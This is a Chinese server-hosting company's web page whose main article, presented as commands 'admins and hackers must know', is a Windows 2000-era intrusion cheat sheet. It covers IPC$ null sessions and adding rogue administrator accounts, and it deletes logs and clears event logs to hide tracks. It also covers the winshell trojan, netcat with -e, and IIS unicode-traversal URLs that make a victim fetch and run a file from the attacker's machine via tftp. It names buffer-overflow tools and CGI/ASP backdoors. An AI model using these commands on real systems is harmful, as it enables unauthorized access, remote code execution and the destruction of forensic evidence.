首页 联系方式 付款方式 关于我们 成功案例 人才招聘
会员 密码 收藏本站
服务器托管
双线机房服务器托管
 双线机房服务器托管
电信机房服务器托管
 电信漕宝路机房服务器托管
 电信真如机房服务器托管
 电信外高桥机房服务器托管
 电信武胜路机房服务器托管
网通机房服务器托管
 网通漕河泾机房服务器托管
 网通乐凯大厦服务器托管
服务器托管常见问题
 如何查看Windows 2003系统日志
 windows 2003如何防止海洋木马
 浅谈网络服务器安全维护技巧
 同一IP地址多域名对应多个站点
 Windows2003 Server 设置大全
 WIN2003下Web服务器配置
 IIS服务器排错指南及错误代码
 服务器终极安全设置与优化指南
 IIS一机多站实现方法
 防治Windows 2003的安全隐患
 Windows2003服务器安全配置
 一次真实的DDoS攻击防御实战
 四招加强Windows2003安全性
 如何测试机房的速度和带宽?
 服务器托管经验完全手册(6)
 网管和黑客都必须知道的命令
 快速掌握典型入侵日志分析
 网站管理员必须知晓的安全知识
 Windows中最重要的五项安全设置
 网管必知十四大安全策略
 十种较为常见服务器管理错误
 打造一个安全的Win2003 Server
 服务器托管经验完全手册(1)
 服务器托管经验完全手册(2)
 服务器托管经验完全手册(3)
 服务器托管经验完全手册(4)
 服务器托管经验完全手册(5)
 Windows权限设置详解

网管和黑客都必须知道的命令

常用的几条net命令:

  (与远程主机建立空管连接) net use \\ip地址\ipc$ "" /use:""

  (以管理员身份登录远程主机) net use \\ip地址\ipc$ "密码" /use:"administrator"

  (传送文件到远程主机winnt目录下)copy 本机目录路径\程序 \\ip地址\admin$

  (查看远程主机时间) net time \\ip地址

  (定时启动某个程序) at \\ip地址 02:18 readme.exe

  (查看共享) net view \\ip地址

  (查看netbios工作组列表) nbtstat -a ip地址

  (将远程主机c盘映射为自己的f盘) net use f: \\ip地址\c$ ""/user:"administrator"

  (这两条把自己增加到管理员组): net user 用户名 密码 /add

  net localgroup administrators 用户名 /add

  (断开连接) net use \\ip地址\ipc$ /delete

  扫尾:

  del c:\winnt\system32\logfiles\*.*

  del c:\winnt\ssytem32\config\*.evt

  del c:\winnt\system32\dtclog\*.*

  del c:\winnt\system32\*.log

  del c:\winnt\system32\*.txt

  del c:\winnt\*.txt

  del c:\winnt\*.log

  一、netsvc.exe

  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

  netsvc /list \\ip地址

  netsvc schedule \\ip地址 /query

  netsvc \\ip地址 schedule /start

  二、opentelnet.exe

  远程启动主机的telnet服务,并绑定端口到7878,例如:

  opentelnet \\ip地址 用户名 密码 1 7878

  然后就可以telnet到主机的7878端口,进入dos方式下:

  telnet ip地址 7878

  三、winshell.exe

  一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd>后,可打下面的命令:

  p path (查看winshell主程序的路径信息)

  b reboot (重新启动机器)

  d shutdown (关闭机器)

  s shell (执行后你就会看到可爱的“c:\>”)

  x exit (退出本次登录会话,此命令并不终止winshell的运行)

  cmd> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

  四、3389登陆器,gui方式登录远程主机的

  五、elsave.exe

  事件日志清除工具

  elsave -s \\ip地址 -l "application" -c

  elsave -s \\ip地址 -l "system" -c

  elsave -s \\ip地址 -l "security" -c

  执行后成功清除应用程序日志,系统日志,安全日志

  六、hbulot.exe

  开启win2kserver和winxp的3389服务

  hbulot [/r]

  使用/r表示安装完成后自动重起目标使设置生效。

  七、nc.exe(netcat.exe)

  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

  想要连接到某处: nc [-options] hostname port[s] [ports] ...

  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

  参数:

  -e prog 程序重定向,一旦连接,就执行 [危险!!]

  -g gateway source-routing hop point[s], up to 8

  -g num source-routing pointer: 4, 8, 12, ...

  -h 帮助信息

  -i secs 延时的间隔

  -l 监听模式,用于入站连接

  -n 指定数字的ip地址,不能用hostname

  -o file 记录16进制的传输

  -p port 本地端口号

  -r 任意指定本地及远程端口

  -s addr 本地源地址

  -u udp模式

  -v 详细输出——用两个-v可得到更详细的内容

  -w secs timeout的时间

  -z 将输入输出关掉——用于扫描时

  八、tftpd32.exe

  把自己的电脑临时变为一台ftp服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用unicode漏洞或telnet到肉鸡,例如:

  http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机ip地址 get 文件名 c:\winnt\system32\文件名

  然后可以直接令文件运行:

  http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

  九、prihack.exe是iis的printer远程缓冲区溢出工具

  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。

  一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有asp执行权限的目录。然后用ie浏览器连接。



相关链接:网页设计 邮件地址 邮件营销 邮件群发 企业名录 美国虚拟主机 网站优化 电信宽带



上海南火 — 飞翔数据中心 © 1999-2006 版权所有 营业执照  官方博客
上海市徐汇区虹漕南路718弄1号10E室 电 话:021-54192538 传真:021-51062789